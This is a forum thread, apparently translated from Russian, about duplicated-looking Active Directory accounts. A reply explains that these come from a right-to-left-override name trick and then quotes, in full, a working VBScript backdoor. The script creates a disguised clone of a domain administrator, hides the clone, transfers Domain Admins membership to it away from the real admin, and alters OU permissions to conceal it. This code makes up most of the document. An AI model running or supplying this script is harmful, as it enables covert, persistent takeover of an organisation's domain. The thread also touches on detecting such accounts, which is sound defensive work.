Answer the question
In order to leave comments, you need to log in
U
U
Uncle Seryozha2014-05-06 16:28:15
Uncle Seryozha, 2014-05-06 16:28:15
Why are there duplicate Active directory accounts?
Why do accounts double?
What does this mean in terms of security?
2 answer(s)
@Protos
Tomorrow I'll sit and think with a fresh mind. How to write a reverse script. Detects accounts with the character ChrW(8238) in the name. I think it's easy to make such a script. But to test the operation of such a checker, you will need a test domain in which "double" records will be created.
@zxc80
V
Vyacheslav Smirnov, 2014-05-14 @Protos
If negative options are considered, then it is a hack.
The second account has the name g_nimdAceTmoC, + the first character indicates the reverse direction of the text.
This move is used to visually hide the presence of a new user in the access control list.
For more details, see the webinar Penetration
Testing in Microsoft Networks (Dmitry Evteev, Head of Security Analysis Department, Positive Technologies, 03/15/2012
14:00 )
or
my.comdi.com/record/46030
update: January 17, 2015.
I read Exploit-db and found an article by Dmitry Evteev. Where is the script to create an account that looks like a double account.
www.exploit-db.com/wp-content/themes/exploit/docs/...
Article in Russian:
devteev.blogspot.ru/2012/01/backdoor-active-direct...
On Error Resume Next
strAdminsamAccountName = "dmitry.ivanov"
strAdminsGroup = "Domain Admins"
strPassNewUser = "[email protected]"
'---
Dim arrContainer(), i
Set objRootDSE = GetObject("LDAP://RootDSE")
strDomain = objRootDSE.Get("DefaultNamingContext")
Set objDomain = GetObject("LDAP://" & strDomain)
strAdminsamAccountNameDN = SearchDN("' WHERE objectCategory='user' AND samAccountName = '" & strAdminsamAccountName & "'")
If Not IsNull(strAdminsamAccountNameDN) Then
Set objAdmin = GetObject("LDAP://" & strAdminsamAccountNameDN)
Set objOU = GetObject(objAdmin.parent)
i=0
Call EnumOUs(objOU)
For j = i-1 To 0 Step-1
if strContainer="" Then
strContainer = "OU=" & arrContainer(j) & strContainer
primaryContainer = strContainer
Else
strContainer = "OU=" & arrContainer(j) & "," & strContainer
End if
Set objOUcreate = objDomain.Create("organizationalUnit", strContainer)
objOUcreate.SetInfo
Next
Set objContainer = GetObject("LDAP://" & strContainer & "," & strDomain)
Set objUserCreate = objContainer.Create("User", "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName))
objUserCreate.Put "sAMAccountName", ChrW(8238) & StrReverse(strAdminsamAccountName)
objUserCreate.SetInfo
On Error Resume Next
objUserCreate.SetPassword strPassNewUser
objUserCreate.Put "userAccountControl", 66048
objUserCreate.Put "givenName", ChrW(8238) & StrReverse(objAdmin.givenName)
objUserCreate.Put "sn", ChrW(8238) & StrReverse(objAdmin.sn)
objUserCreate.Put "initials", ChrW(8238) & StrReverse(objAdmin.initials)
objUserCreate.SetInfo
On Error Resume Next
objUserCreate.Put "showInAdvancedViewOnly", "TRUE"
objUserCreate.SetInfo
On Error Resume Next
NewUserDN = "cn=" & ChrW(8238) & StrReverse(objAdmin.displayName) & "," & objContainer.distinguishedName
strAdminsGroupDN = SearchDN("' WHERE objectCategory='group' AND samAccountName = '" & strAdminsGroup & "'")
If Not IsNull(strAdminsGroupDN) Then
Set objGroup = GetObject("LDAP://" & strAdminsGroupDN)
objGroup.PutEx 4, "member", Array(strAdminsamAccountNameDN)
objGroup.SetInfo
objGroup.PutEx 3, "member", Array(NewUserDN)
objGroup.SetInfo
End If
OUAddAce(primaryContainer & "," & strDomain)
End If
Function SearchDN(str)
Set objConnection = CreateObject("ADODB.Connection")
objConnection.Provider = "ADsDSOObject"
objConnection.Open "Active Directory Provider"
Set objCommand = CreateObject("ADODB.Command")
Set objCommand.ActiveConnection = objConnection
objCommand.Properties("Searchscope") = 2
objCommand.CommandText = "SELECT distinguishedName FROM 'LDAP://" & strDomain & str
Set objRecordSet = objCommand.Execute
If Not objRecordSet.EOF Then
SearchDN = objRecordSet.Fields("distinguishedName").Value
End if
End Function
Sub EnumOUs(objChild)
Dim objParent
Set objParent = GetObject(objChild.Parent)
If (objParent.Class = "organizationalUnit") Then
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou
i=i+1
Call EnumOUs(objParent)
Else
ReDim Preserve arrContainer(i + 1)
arrContainer(i) = objChild.ou & ChrW(128)
i=i+1
End If
End Sub
Function OUAddAce(OU)
Dim objSdUtil, objSD, objDACL, objAce
Set objOU = GetObject ("LDAP://" & OU)
Set objSdUtil = GetObject(objOU.ADsPath)
Set objSD = objSdUtil.Get("ntSecurityDescriptor")
Set objDACL = objSD.DiscretionaryACL
Set objAce = CreateObject("AccessControlEntry")
objAce.Trustee = "Everyone"
objAce.AceFlags = 2
objAce.AceType = 6
objAce.AccessMask = 16
objAce.Flags = 1
objAce.ObjectType = "{E48D0154-BCF8-11D1-8702-00C04FB96050}"
objDacl.AddAce objAce
objSD.DiscretionaryAcl = objDacl
objSDUtil.Put "ntSecurityDescriptor", Array(objSD)
objSDUtil.SetInfo
Set objNtSecurityDescriptor = objOU.Get("ntSecurityDescriptor")
intNtSecurityDescriptorControl = objNtSecurityDescriptor.Control
intNtSecurityDescriptorControl = intNtSecurityDescriptorControl Xor &H1000
objNtSecurityDescriptor.Control = intNtSecurityDescriptorControl
objOU.Put "ntSecurityDescriptor", objNtSecurityDescriptor
objOU.SetInfo
End FunctionTomorrow I'll sit and think with a fresh mind. How to write a reverse script. Detects accounts with the character ChrW(8238) in the name. I think it's easy to make such a script. But to test the operation of such a checker, you will need a test domain in which "double" records will be created.
P
Pavel Vasterov, 2014-05-08 @zxc80
What is this for? OO Uchetka
is not a name, it is a SID (without going into details)
Similar questions
A
I
S
K
N
NuRsAk2015-11-18 15:51:02
SMTP relay to AD Site Exchange 2010 not working, how to find out why?
2Reply
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question